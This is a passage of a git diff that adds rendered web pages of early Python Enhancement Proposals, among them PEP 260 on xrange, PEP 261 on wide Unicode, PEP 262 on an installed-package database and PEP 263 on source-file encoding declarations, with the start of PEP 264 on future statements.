http://sourceforge.net/tracker/index.php?func=detail&aid=432183&group_id=5470&atid=305470
+
+
+
+
+

Rejected

+

The user community unanimously rejected this, so I won’t pursue +this idea any further. Frequently heard arguments against +included:

+
    +
  • It is likely to break thousands of CGI scripts.
  • +
  • Enough magic already (also: no more tinkering with ‘print’ +please).
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0259.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0260/index.html b/pep-0260/index.html
new file mode 100644
index 00000000000..f7519e5f365
--- /dev/null
+++ b/pep-0260/index.html
@@ -0,0 +1,198 @@
PEP 260 – Simplify xrange() | peps.python.org
+
+


+ + +
+
+
+

PEP 260 – Simplify xrange()

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
26-Jun-2001
+
+
+
+
+
+

Abstract

+

This PEP proposes to strip the xrange() object from some rarely +used behavior like x[i:j] and x*n.

+
+
+

Problem

+

The xrange() function has one idiomatic use:

+
for i in xrange(...): ...
+
+
+

However, the xrange() object has a bunch of rarely used behaviors +that attempt to make it more sequence-like. These are so rarely +used that historically they have had serious bugs (e.g. off-by-one +errors) that went undetected for several releases.

+

I claim that it’s better to drop these unused features. This will +simplify the implementation, testing, and documentation, and +reduce maintenance and code size.

+
+
+

Proposed Solution

+

I propose to strip the xrange() object to the bare minimum. The +only retained sequence behaviors are x[i], len(x), and repr(x). +In particular, these behaviors will be dropped:

+
    +
  • x[i:j] (slicing)
  • +
  • x*n, n*x (sequence-repeat)
  • +
  • cmp(x1, x2) (comparisons)
  • +
  • i in x (containment test)
  • +
  • x.tolist() method
  • +
  • x.start, x.stop, x.step attributes
  • +
+
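To make the retained subset concrete (an illustrative Python 2 session):

>>> x = xrange(2, 10, 2)
>>> len(x)          # retained
4
>>> x[2]            # retained
6
>>> repr(x)         # retained
'xrange(2, 10, 2)'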

I also propose to change the signature of the PyRange_New() C API +to remove the 4th argument (the repetition count).

+

By implementing a custom iterator type, we could speed up the +common use, but this is optional (the default sequence iterator +does just fine).

+
+
+

Scope

+

This PEP affects the xrange() built-in function and the +PyRange_New() C API.

+
+
+

Risks

+

Somebody’s code could be relying on the extended code, and this +code would break. However, given that historically bugs in the +extended code have gone undetected for so long, it’s unlikely that +much code is affected.

+
+
+

Transition

+

For backwards compatibility, the existing functionality will still +be present in Python 2.2, but will trigger a warning. A year +after Python 2.2 final is released (probably in 2.4) the +functionality will be ripped out.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0260.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0261/index.html b/pep-0261/index.html
new file mode 100644
index 00000000000..7110a81d039
--- /dev/null
+++ b/pep-0261/index.html
@@ -0,0 +1,370 @@
PEP 261 – Support for “wide” Unicode characters | peps.python.org
+
+


+ + +
+
+
+

PEP 261 – Support for “wide” Unicode characters

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
27-Jun-2001
+
+
+
+
+
+

Abstract

+

Python 2.1 unicode characters can have ordinals only up to 2**16 - 1. +This range corresponds to a range in Unicode known as the Basic +Multilingual Plane. There are now characters in Unicode that live +on other “planes”. The largest addressable character in Unicode +has the ordinal 17 * 2**16 - 1 (0x10ffff). For readability, we +will call this TOPCHAR and call characters in this range “wide +characters”.

+
+
+

Glossary

+
+
Character
Used by itself, means the addressable units of a Python +Unicode string.
+
Code point
A code point is an integer between 0 and TOPCHAR. +If you imagine Unicode as a mapping from integers to +characters, each integer is a code point. But the +integers between 0 and TOPCHAR that do not map to +characters are also code points. Some will someday +be used for characters. Some are guaranteed never +to be used for characters.
+
Codec
A set of functions for translating between physical +encodings (e.g. on disk or coming in from a network) +into logical Python objects.
+
Encoding
Mechanism for representing abstract characters in terms of +physical bits and bytes. Encodings allow us to store +Unicode characters on disk and transmit them over networks +in a manner that is compatible with other Unicode software.
+
Surrogate pair
Two physical characters that represent a single logical +character. Part of a convention for representing 32-bit +code points in terms of two 16-bit code points.
+
Unicode string
A Python type representing a sequence of code points with +“string semantics” (e.g. case conversions, regular +expression compatibility, etc.) Constructed with the +unicode() function.
+
+
+
+

Proposed Solution

+

One solution would be to merely increase the maximum ordinal +to a larger value. Unfortunately the only straightforward +implementation of this idea is to use 4 bytes per character. +This has the effect of doubling the size of most Unicode +strings. In order to avoid imposing this cost on every +user, Python 2.2 will allow the 4-byte implementation as a +build-time option. Users can choose whether they care about +wide characters or prefer to preserve memory.

+

The 4-byte option is called “wide Py_UNICODE”. The 2-byte option +is called “narrow Py_UNICODE”.

+

Most things will behave identically in the wide and narrow worlds.

+
    +
  • unichr(i) for 0 <= i < 2**16 (0x10000) always returns a +length-one string.
  • +
  • unichr(i) for 2**16 <= i <= TOPCHAR will return a +length-one string on wide Python builds. On narrow builds it will +raise ValueError.

    ISSUE

    +
    +
    Python currently allows \U literals that cannot be +represented as a single Python character. It generates two +Python characters known as a “surrogate pair”. Should this +be disallowed on future narrow Python builds?
    +

    Pro:

    +
    +
    Python already allows the construction of a surrogate pair for a large unicode literal character escape sequence. This is basically designed as a simple way to construct “wide characters” even in a narrow Python build. It is also somewhat logical considering that the Unicode-literal syntax is basically a short-form way of invoking the unicode-escape codec.
    +

    Con:

    +
    +
    Surrogates could be easily created this way but the user +still needs to be careful about slicing, indexing, printing +etc. Therefore, some have suggested that Unicode +literals should not support surrogates.
    +

    ISSUE

    +
    +
    Should Python allow the construction of characters that do +not correspond to Unicode code points? Unassigned Unicode +code points should obviously be legal (because they could +be assigned at any time). But code points above TOPCHAR are +guaranteed never to be used by Unicode. Should we allow access +to them anyhow?
    +

    Pro:

    +
    +
    If a Python user thinks they know what they’re doing, why should we try to prevent them from violating the Unicode spec? After all, we don’t stop 8-bit strings from containing non-ASCII characters.
    +

    Con:

    +
    +
    Codecs and other Unicode-consuming code will have to be +careful of these characters which are disallowed by the +Unicode specification.
    +
  • +
  • ord() is always the inverse of unichr()
  • +
  • There is an integer value in the sys module that describes the +largest ordinal for a character in a Unicode string on the current +interpreter. sys.maxunicode is 2**16-1 (0xffff) on narrow builds +of Python and TOPCHAR on wide builds.

    ISSUE:

    +
    +
    Should there be distinct constants for accessing +TOPCHAR and the real upper bound for the domain of +unichr (if they differ)? There has also been a +suggestion of sys.unicodewidth which can take the +values 'wide' and 'narrow'.
    +
  • +
  • every Python Unicode character represents exactly one Unicode code +point (i.e. Python Unicode Character = Abstract Unicode character).
  • +
  • codecs will be upgraded to support “wide characters” +(represented directly in UCS-4, and as variable-length sequences +in UTF-8 and UTF-16). This is the main part of the implementation +left to be done.
  • +
  • There is a convention in the Unicode world for encoding a 32-bit code point in terms of two 16-bit code points. These are known as “surrogate pairs”. Python’s codecs will adopt this convention and encode 32-bit code points as surrogate pairs on narrow Python builds (see the sketch after this list).

    ISSUE

    +
    +
    Should there be a way to tell codecs not to generate +surrogates and instead treat wide characters as +errors?
    +

    Pro:

    +
    +
    I might want to write code that works only with +fixed-width characters and does not have to worry about +surrogates.
    +

    Con:

    +
    +
    No clear proposal of how to communicate this to codecs.
    +
  • +
  • there are no restrictions on constructing strings that use +code points “reserved for surrogates” improperly. These are +called “isolated surrogates”. The codecs should disallow reading +these from files, but you could construct them using string +literals or unichr().
  • +
+
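The sketch promised above: a minimal Python illustration of two build-dependent facts from this list. sys.maxunicode separates narrow from wide builds, and the standard Unicode convention turns a code point above 0xffff into a pair of 16-bit code points. The arithmetic follows the Unicode standard; this is an illustration, not the codec implementation that this PEP leaves to be done.

import sys

def is_wide_build():
    # sys.maxunicode is 0xffff on narrow builds, 0x10ffff (TOPCHAR) on wide builds
    return sys.maxunicode > 0xffff

def to_surrogate_pair(cp):
    # standard convention for representing a 32-bit code point
    # as two 16-bit code points (used by narrow builds and UTF-16)
    assert 0x10000 <= cp <= 0x10ffff
    cp = cp - 0x10000
    high = 0xd800 + (cp >> 10)     # lead (high) surrogate
    low = 0xdc00 + (cp & 0x3ff)    # trail (low) surrogate
    return high, low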
+
+

Implementation

+

There is a new define:

+
#define Py_UNICODE_SIZE 2
+
+
+

To test whether UCS2 or UCS4 is in use, the derived macro +Py_UNICODE_WIDE should be used, which is defined when UCS-4 is in +use.

+

There is a new configure option:

+ + + + + + + + + + + + + + + +
--enable-unicode=ucs2    configures a narrow Py_UNICODE, and uses wchar_t if it fits
--enable-unicode=ucs4    configures a wide Py_UNICODE, and uses wchar_t if it fits
--enable-unicode         same as “=ucs2”
--disable-unicode        entirely remove the Unicode functionality.
+

It is also proposed that one day --enable-unicode will just default to the width of your platform’s wchar_t.

+

Windows builds will be narrow for a while, based on the facts that there have been few requests for wide characters, that those requests come mostly from hard-core programmers with the ability to build their own Python, and that Windows itself is strongly biased towards 16-bit characters.

+
+
+

Notes

+

This PEP does NOT imply that people using Unicode need to use a +4-byte encoding for their files on disk or sent over the network. +It only allows them to do so. For example, ASCII is still a +legitimate (7-bit) Unicode-encoding.

+

It has been proposed that there should be a module that handles +surrogates in narrow Python builds for programmers. If someone +wants to implement that, it will be another PEP. It might also be +combined with features that allow other kinds of character-, +word- and line- based indexing.

+
+
+

Rejected Suggestions

+

More or less the status-quo

+
+
We could officially say that Python characters are 16-bit and +require programmers to implement wide characters in their +application logic by combining surrogate pairs. This is a heavy +burden because emulating 32-bit characters is likely to be +very inefficient if it is coded entirely in Python. Plus these +abstracted pseudo-strings would not be legal as input to the +regular expression engine.
+

“Space-efficient Unicode” type

+
+
Another class of solution is to use some efficient storage +internally but present an abstraction of wide characters to +the programmer. Any of these would require a much more complex +implementation than the accepted solution. For instance consider +the impact on the regular expression engine. In theory, we could +move to this implementation in the future without breaking Python +code. A future Python could “emulate” wide Python semantics on +narrow Python. Guido is not willing to undertake the +implementation right now.
+

Two types

+
+
We could introduce a 32-bit Unicode type alongside the 16-bit +type. There is a lot of code that expects there to be only a +single Unicode type.
+

This PEP represents the least-effort solution. Over the next +several years, 32-bit Unicode characters will become more common +and that may either convince us that we need a more sophisticated +solution or (on the other hand) convince us that simply +mandating wide Unicode characters is an appropriate solution. +Right now the two options on the table are do nothing or do +this.

+
+
+

References

+

Unicode Glossary: http://www.unicode.org/glossary/

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0261.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0262/index.html b/pep-0262/index.html new file mode 100644 index 00000000000..cfcf18d2e08 --- /dev/null +++ b/pep-0262/index.html @@ -0,0 +1,450 @@ + PEP 262 – A Database of Installed Python Packages | peps.python.org +
+
+


+ + +
+
+
+

PEP 262 – A Database of Installed Python Packages

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jul-2001
+
Post-History:
+
27-Mar-2002
+
+
+
+
+
+

Note

+

This PEP was superseded by PEP 345 and PEP 376, which were accepted. +Therefore, this PEP is (by implication) rejected.

+
+
+

Introduction

+

This PEP describes a format for a database of the Python software +installed on a system.

+

(In this document, the term “distribution” is used to mean a set +of code that’s developed and distributed together. A “distribution” +is the same as a Red Hat or Debian package, but the term “package” +already has a meaning in Python terminology, meaning “a directory +with an __init__.py file in it.”)

+
+
+

Requirements

+

We need a way to figure out what distributions, and what versions of +those distributions, are installed on a system. We want to provide +features similar to CPAN, APT, or RPM. Required use cases that +should be supported are:

+
    +
  • Is distribution X on a system?
  • +
  • What version of distribution X is installed?
  • +
  • Where can the new version of distribution X be found? (This can +be defined as either “a home page where the user can go and +find a download link”, or “a place where a program can find +the newest version?” Both should probably be supported.)
  • +
  • What files did distribution X put on my system?
  • +
  • What distribution did the file x/y/z.py come from?
  • +
  • Has anyone modified x/y/z.py locally?
  • +
  • What other distributions does this software need?
  • +
  • What Python modules does this distribution provide?
  • +
+
+
+

Database Location

+

The database lives in a bunch of files under +<prefix>/lib/python<version>/install-db/. This location will be +called INSTALLDB through the remainder of this PEP.

+

The structure of the database is deliberately kept simple; each +file in this directory or its subdirectories (if any) describes a +single distribution. Binary packagings of Python software such as +RPMs can then update Python’s database by just installing the +corresponding file into the INSTALLDB directory.

+

The rationale for scanning subdirectories is that we can move to a +directory-based indexing scheme if the database directory contains +too many entries. For example, this would let us transparently +switch from INSTALLDB/Numeric to INSTALLDB/N/Nu/Numeric or some +similar hashing scheme.

+
+
+

Database Contents

+

Each file in INSTALLDB or its subdirectories describes a single +distribution, and has the following contents:

+

An initial line listing the sections in this file, separated +by whitespace. Currently this will always be ‘PKG-INFO FILES +REQUIRES PROVIDES’. This is for future-proofing; if we add a +new section, for example to list documentation files, then +we’d add a DOCS section and list it in the contents. Sections +are always separated by blank lines.

+
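For concreteness, a hypothetical database entry might begin as follows. Only the section-listing first line and the PKG-INFO headers (from PEP 241) are specified here; the metadata values are invented:

PKG-INFO FILES REQUIRES PROVIDES

Metadata-Version: 1.0
Name: ExampleDist
Version: 1.0
...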

A distribution that uses the Distutils for installation should +automatically update the database. Distributions that roll their +own installation will have to use the database’s API to +manually add or update their own entry. System package managers +such as RPM or pkgadd can just create the new file in the +INSTALLDB directory.

+

Each section of the file is used for a different purpose.

+
+

PKG-INFO section

+

An initial set of RFC 822 headers containing the distribution +information for a file, as described in PEP 241, “Metadata for +Python Software Packages”.

+
+
+

FILES section

+

An entry for each file installed by the +distribution. Generated files such as .pyc and .pyo files are +on this list as well as the original .py files installed by a +distribution; their checksums won’t be stored or checked, +though.

+

Each file’s entry is a single tab-delimited line that contains the following fields (a parsing sketch follows the list):

+
    +
  • The file’s full path, as installed on the system.
  • +
  • The file’s size
  • +
  • The file’s permissions. On Windows, this field will always be +‘unknown’
  • +
  • The owner and group of the file, separated by a tab. +On Windows, these fields will both be ‘unknown’.
  • +
  • A SHA1 digest of the file, encoded in hex. For generated files +such as *.pyc files, this field must contain the string “-“, +which indicates that the file’s checksum should not be verified.
  • +
+
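A minimal Python sketch of reading one FILES-section entry as specified in the list above. The function and variable names are mine; only the field order and the “-” digest convention come from this PEP:

def parse_files_line(line):
    # fields are tab-delimited, in the order given above
    path, size, perms, owner, group, digest = line.rstrip('\n').split('\t')
    verify = (digest != '-')   # '-' marks generated files such as .pyc/.pyo
    return path, int(size), perms, owner, group, digest, verify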
+
+

REQUIRES section

+

This section is a list of strings giving the services required for +this module distribution to run properly. This list includes the +distribution name (“python-stdlib”) and module names (“rfc822”, +“htmllib”, “email”, “email.Charset”). It will be specified +by an extra ‘requires’ argument to the distutils.core.setup() +function. For example:

+
setup(..., requires=['xml.utils.iso8601'])
+
+
+

Eventually there may be automated tools that look through all of +the code and produce a list of requirements, but it’s unlikely +that these tools can handle all possible cases; a manual +way to specify requirements will always be necessary.

+
+
+

PROVIDES section

+

This section is a list of strings giving the services provided by +an installed distribution. This list includes the distribution name +(“python-stdlib”) and module names (“rfc822”, “htmllib”, “email”, +“email.Charset”).

+

XXX should files be listed? e.g. $PREFIX/lib/color-table.txt, +to pick up data files, required scripts, etc.

+

Eventually there may be an option to let module developers add +their own strings to this section. For example, you might add +“XML parser” to this section, and other module distributions could +then list “XML parser” as one of their dependencies to indicate +that multiple different XML parsers can be used. For now this +ability isn’t supported because it raises too many issues: do we +need a central registry of legal strings, or just let people put +whatever they like? Etc., etc…

+
+
+
+

API Description

+

There’s a single fundamental class, InstallationDatabase. The +code for it lives in distutils/install_db.py. (XXX any +suggestions for alternate locations in the standard library, or an +alternate module name?)

+

The InstallationDatabase returns instances of Distribution that contain +all the information about an installed distribution.

+

XXX Several of the fields in Distribution are duplicates of ones in +distutils.dist.Distribution. Probably they should be factored out +into the Distribution class proposed here, but can this be done in a +backward-compatible way?

+

InstallationDatabase has the following interface:

+
class InstallationDatabase:
+    def __init__ (self, path=None):
+        """InstallationDatabase(path:string)
+        Read the installation database rooted at the specified path.
+        If path is None, INSTALLDB is used as the default.
+        """
+
+    def get_distribution (self, distribution_name):
+        """get_distribution(distribution_name:string) : Distribution
+        Get the object corresponding to a single distribution.
+        """
+
+    def list_distributions (self):
+        """list_distributions() : [Distribution]
+        Return a list of all distributions installed on the system,
+        enumerated in no particular order.
+        """
+
+    def find_distribution (self, path):
+        """find_file(path:string) : Distribution
+        Search and return the distribution containing the file 'path'.
+        Returns None if the file doesn't belong to any distribution
+        that the InstallationDatabase knows about.
+        XXX should this work for directories?
+        """
+
+class Distribution:
+    """Instance attributes:
+    name : string
+      Distribution name
+    files : {string : (size:int, perms:int, owner:string, group:string,
+                       digest:string)}
+       Dictionary mapping the path of a file installed by this distribution
+       to information about the file.
+
+    The following fields all come from PEP 241.
+
+    version : distutils.version.Version
+      Version of this distribution
+    platform : [string]
+    summary : string
+    description : string
+    keywords : string
+    home_page : string
+    author : string
+    author_email : string
+    license : string
+    """
+
+    def add_file (self, path):
+        """add_file(path:string):None
+        Record the size, ownership, &c., information for an installed file.
+        XXX as written, this would stat() the file.  Should the size/perms/
+        checksum all be provided as parameters to this method instead?
+        """
+
+    def has_file (self, path):
+        """has_file(path:string) : Boolean
+        Returns true if the specified path belongs to a file in this
+        distribution.
+        """
+
+    def check_file (self, path):
+        """check_file(path:string) : Boolean
+        Checks whether the file's size, checksum, and ownership match,
+        returning true if they do.
+        """
+
+
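To make the intended use concrete, a hypothetical session with the proposed API (the module location is the one suggested above, which never shipped; the distribution name and file path are invented):

from distutils.install_db import InstallationDatabase

db = InstallationDatabase()          # reads INSTALLDB by default
dist = db.get_distribution('ExampleDist')
if dist is not None and not dist.check_file('/usr/lib/site-packages/example.py'):
    print 'file has been modified since installation'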
+
+
+

Deliverables

+

A description of the database API, to be added to this PEP.

+

Patches to the Distutils that 1) implement an InstallationDatabase class, 2) update the database when a new distribution is installed, and 3) add a simple package management tool, features to be added to this PEP. (Or should that be a separate PEP?) See [2] for the current patch.

+
+
+

Open Issues

+

PJE suggests the installation database “be potentially present on +every directory in sys.path, with the contents merged in sys.path +order. This would allow home-directory or other +alternate-location installs to work, and ease the process of a +distutils install command writing the file.” Nice feature: it does +mean that package manager tools can take into account Python +packages that a user has privately installed.

+

AMK wonders: what does setup.py do if it’s told to install +packages to a directory not on sys.path? Does it write an +install-db directory to the directory it’s told to write to, or +does it do nothing?

+

Should the package-database file itself be included in the files +list? (PJE would think yes, but of course it can’t contain its +own checksum. AMK can’t think of a use case where including the +DB file matters.)

+

PJE wonders about writing the package DB file +first, before installing any other files, so that failed partial +installations can both be backed out, and recognized as broken. +This PEP may have to specify some algorithm for recognizing this +situation.

+

Should we guarantee the format of installation databases remains +compatible across Python versions, or is it subject to arbitrary +change? Probably we need to guarantee compatibility.

+
+
+

Rejected Suggestions

+

Instead of using one text file per distribution, one large text +file or an anydbm file could be used. This has been rejected for +a few reasons. First, performance is probably not an extremely +pressing concern as the database is only used when installing or +removing software, a relatively infrequent task. Scalability also +likely isn’t a problem, as people may have hundreds of Python +packages installed, but thousands or tens of thousands seems +unlikely. Finally, individual text files are compatible with +installers such as RPM or DPKG because a binary packager can just +drop the new database file into the database directory. If one +large text file or a binary file were used, the Python database +would then have to be updated by running a postinstall script.

+

On Windows, the permissions and owner/group of a file aren’t +stored. Windows does in fact support ownership and access +permissions, but reading and setting them requires the win32all +extensions, and they aren’t present in the basic Python installer +for Windows.

+
+
+

References

+

[1] Michael Muller’s patch (posted to the Distutils-SIG around 28 Dec 1999) generates a list of installed files.

+ +
+
+

Acknowledgements

+

Ideas for this PEP originally came from postings by Greg Ward, +Fred L. Drake Jr., Thomas Heller, Mats Wichmann, Phillip J. Eby, +and others.

+

Many changes and rewrites to this document were suggested by the +readers of the Distutils SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0262.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0263/index.html b/pep-0263/index.html new file mode 100644 index 00000000000..ee83ccbb63c --- /dev/null +++ b/pep-0263/index.html @@ -0,0 +1,392 @@ + PEP 263 – Defining Python Source Code Encodings | peps.python.org +
+
+


+ + +
+
+
+

PEP 263 – Defining Python Source Code Encodings

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>, +Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-Jun-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes to introduce a syntax to declare the encoding of +a Python source file. The encoding information is then used by the +Python parser to interpret the file using the given encoding. Most +notably this enhances the interpretation of Unicode literals in +the source code and makes it possible to write Unicode literals +using e.g. UTF-8 directly in an Unicode aware editor.

+
+
+

Problem

+

In Python 2.1, Unicode literals can only be written using the +Latin-1 based encoding “unicode-escape”. This makes the +programming environment rather unfriendly to Python users who live +and work in non-Latin-1 locales such as many of the Asian +countries. Programmers can write their 8-bit strings using the +favorite encoding, but are bound to the “unicode-escape” encoding +for Unicode literals.

+
+
+

Proposed Solution

+

I propose to make the Python source code encoding both visible and +changeable on a per-source file basis by using a special comment +at the top of the file to declare the encoding.

+

To make Python aware of this encoding declaration a number of +concept changes are necessary with respect to the handling of +Python source code data.

+
+
+

Defining the Encoding

+

Python will default to ASCII as standard encoding if no other +encoding hints are given.

+

To define a source code encoding, a magic comment must +be placed into the source files either as first or second +line in the file, such as:

+
# coding=<encoding name>
+
+
+

or (using formats recognized by popular editors):

+
#!/usr/bin/python
+# -*- coding: <encoding name> -*-
+
+
+

or:

+
#!/usr/bin/python
+# vim: set fileencoding=<encoding name> :
+
+
+

More precisely, the first or second line must match the following +regular expression:

+
^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)
+
+
+

The first group of this expression is then interpreted as the encoding name. If the encoding is unknown to Python, an error is raised during compilation. There must not be any Python statement on the line that contains the encoding declaration. If the first line matches, the second line is ignored.

+

To aid with platforms such as Windows, which add Unicode BOM marks +to the beginning of Unicode files, the UTF-8 signature +\xef\xbb\xbf will be interpreted as ‘utf-8’ encoding as well +(even if no magic encoding comment is given).

+

If a source file uses both the UTF-8 BOM mark signature and a +magic encoding comment, the only allowed encoding for the comment +is ‘utf-8’. Any other encoding will cause an error.

+
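The detection rules above can be summarized in a short Python sketch. This mirrors, but is not, the tokenizer’s actual implementation, and it omits the error for a BOM combined with a non-utf-8 magic comment:

import re

CODING_RE = re.compile(r"^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)")
BOM_UTF8 = '\xef\xbb\xbf'

def guess_source_encoding(line1, line2):
    if line1.startswith(BOM_UTF8):
        return 'utf-8'            # the BOM decides; a comment may only agree
    for line in (line1, line2):
        m = CODING_RE.match(line)
        if m:
            return m.group(1)     # first match wins; the second line is then ignored
    return 'ascii'                # the default this PEP specifies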
+
+

Examples

+

These are some examples to clarify the different styles for +defining the source code encoding at the top of a Python source +file:

+
    +
  1. With interpreter binary and using Emacs style file encoding +comment:
    #!/usr/bin/python
    +# -*- coding: latin-1 -*-
    +import os, sys
    +...
    +
    +#!/usr/bin/python
    +# -*- coding: iso-8859-15 -*-
    +import os, sys
    +...
    +
    +#!/usr/bin/python
    +# -*- coding: ascii -*-
    +import os, sys
    +...
    +
    +
    +
  2. +
  3. Without interpreter line, using plain text:
    # This Python file uses the following encoding: utf-8
    +import os, sys
    +...
    +
    +
    +
  4. +
  5. Text editors might have different ways of defining the file’s +encoding, e.g.:
    #!/usr/local/bin/python
    +# coding: latin-1
    +import os, sys
    +...
    +
    +
    +
  6. +
  7. Without encoding comment, Python’s parser will assume ASCII +text:
    #!/usr/local/bin/python
    +import os, sys
    +...
    +
    +
    +
  8. +
  9. Encoding comments which don’t work:
      +
    1. Missing “coding:” prefix:
      #!/usr/local/bin/python
      +# latin-1
      +import os, sys
      +...
      +
      +
      +
    2. +
    3. Encoding comment not on line 1 or 2:
      #!/usr/local/bin/python
      +#
      +# -*- coding: latin-1 -*-
      +import os, sys
      +...
      +
      +
      +
    4. +
    5. Unsupported encoding:
      #!/usr/local/bin/python
      +# -*- coding: utf-42 -*-
      +import os, sys
      +...
      +
      +
      +
    6. +
    +
  10. +
+
+
+

Concepts

+

The PEP is based on the following concepts which would have to be +implemented to enable usage of such a magic comment:

+
    +
  1. The complete Python source file should use a single encoding. +Embedding of differently encoded data is not allowed and will +result in a decoding error during compilation of the Python +source code.

    Any encoding which allows processing the first two lines in the way indicated above is allowed as source code encoding; this includes ASCII-compatible encodings as well as certain multi-byte encodings such as Shift_JIS. It does not include encodings which use two or more bytes for all characters, like e.g. UTF-16. The reason for this is to keep the encoding detection algorithm in the tokenizer simple.

    +
  2. +
  3. Handling of escape sequences should continue to work as it does +now, but with all possible source code encodings, that is +standard string literals (both 8-bit and Unicode) are subject to +escape sequence expansion while raw string literals only expand +a very small subset of escape sequences.
  4. +
  5. Python’s tokenizer/compiler combo will need to be updated to +work as follows:
      +
    1. read the file
    2. +
    3. decode it into Unicode assuming a fixed per-file encoding
    4. +
    5. convert it into a UTF-8 byte string
    6. +
    7. tokenize the UTF-8 content
    8. +
    9. compile it, creating Unicode objects from the given Unicode data +and creating string objects from the Unicode literal data +by first reencoding the UTF-8 data into 8-bit string data +using the given file encoding
    10. +
    +
  6. +
+

Note that Python identifiers are restricted to the ASCII +subset of the encoding, and thus need no further conversion +after step 4.

+
+
+

Implementation

+

For backwards-compatibility with existing code which currently +uses non-ASCII in string literals without declaring an encoding, +the implementation will be introduced in two phases:

+
    +
  1. Allow non-ASCII in string literals and comments, by internally +treating a missing encoding declaration as a declaration of +“iso-8859-1”. This will cause arbitrary byte strings to +correctly round-trip between step 2 and step 5 of the +processing, and provide compatibility with Python 2.2 for +Unicode literals that contain non-ASCII bytes.

    A warning will be issued if non-ASCII bytes are found in the +input, once per improperly encoded input file.

    +
  2. +
  3. Remove the warning, and change the default encoding to “ascii”.
  4. +
+

The builtin compile() API will be enhanced to accept Unicode as +input. 8-bit string input is subject to the standard procedure for +encoding detection as described above.

+

If a Unicode string with a coding declaration is passed to compile(), +a SyntaxError will be raised.

+

SUZUKI Hisao is working on a patch; see [2] for details. A patch +implementing only phase 1 is available at [1].

+
+
+

Phases

+

Implementation of steps 1 and 2 above was completed in 2.3, except for changing the default encoding to “ascii”.

+

The default encoding was set to “ascii” in version 2.5.

+
+
+

Scope

+

This PEP intends to provide an upgrade path from the current +(more-or-less) undefined source code encoding situation to a more +robust and portable definition.

+
+
+

References

+ +
+
+

History

+
    +
  • 1.10 and above: see CVS history
  • +
  • 1.8: Added ‘.’ to the coding RE.
  • +
  • 1.7: Added warnings to phase 1 implementation. Replaced the +Latin-1 default encoding with the interpreter’s default +encoding. Added tweaks to compile().
  • +
  • 1.4 - 1.6: Minor tweaks
  • +
  • 1.3: Worked in comments by Martin v. Loewis: +UTF-8 BOM mark detection, Emacs style magic comment, +two phase approach to the implementation
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0263.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0264/index.html b/pep-0264/index.html new file mode 100644 index 00000000000..7f4264b80a3 --- /dev/null +++ b/pep-0264/index.html @@ -0,0 +1,248 @@ + PEP 264 – Future statements in simulated shells | peps.python.org +
+
+


+ + +
+
+
+

PEP 264 – Future statements in simulated shells

+
+
Author:
+
Michael Hudson <mwh at python.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
236
+
Created:
+
30-Jul-2001
+
Python-Version:
+
2.2
+
Post-History:
+
30-Jul-2001
+
+
+
+
+
+

Abstract

+

As noted in PEP 236, there is no clear way for “simulated +interactive shells” to simulate the behaviour of __future__ +statements in “real” interactive shells, i.e. have __future__ +statements’ effects last the life of the shell.

+

The PEP also takes the opportunity to clean up the other +unresolved issue mentioned in PEP 236, the inability to stop +compile() inheriting the effect of future statements affecting the +code calling compile().

+

This PEP proposes to address the first problem by adding an +optional fourth argument to the builtin function “compile”, adding +information to the _Feature instances defined in __future__.py and +adding machinery to the standard library modules “codeop” and +“code” to make the construction of such shells easy.

+

The second problem is dealt with by simply adding another +optional argument to compile(), which if non-zero suppresses the +inheriting of future statements’ effects.

+
+
+

Specification

+

I propose adding a fourth, optional, “flags” argument to the +builtin “compile” function. If this argument is omitted, +there will be no change in behaviour from that of Python 2.1.

+

If it is present it is expected to be an integer, representing +various possible compile time options as a bitfield. The +bitfields will have the same values as the CO_* flags already used +by the C part of Python interpreter to refer to future statements.

+

compile() shall raise a ValueError exception if it does not +recognize any of the bits set in the supplied flags.

+

The flags supplied will be bitwise-“or”ed with the flags that +would be set anyway, unless the new fifth optional argument is a +non-zero integer, in which case the flags supplied will be exactly +the set used.

+

The above-mentioned flags are not currently exposed to Python. I +propose adding .compiler_flag attributes to the _Feature objects +in __future__.py that contain the necessary bits, so one might +write code such as:

+
import __future__
+def compile_generator(func_def):
+    return compile(func_def, "<input>", "suite",
+                __future__.generators.compiler_flag)
+
+
+

A recent change means that these same bits can be used to tell if +a code object was compiled with a given feature; for instance

+
codeob.co_flags & __future__.generators.compiler_flag
+
+
+

will be non-zero if and only if the code object “codeob” was +compiled in an environment where generators were allowed.

+

I will also add a .all_feature_flags attribute to the __future__ +module, giving a low-effort way of enumerating all the __future__ +options supported by the running interpreter.

+

I also propose adding a pair of classes to the standard library +module codeop.

+

One - Compile - will sport a __call__ method which will act much +like the builtin “compile” of 2.1 with the difference that after +it has compiled a __future__ statement, it “remembers” it and +compiles all subsequent code with the __future__ option in effect.

+

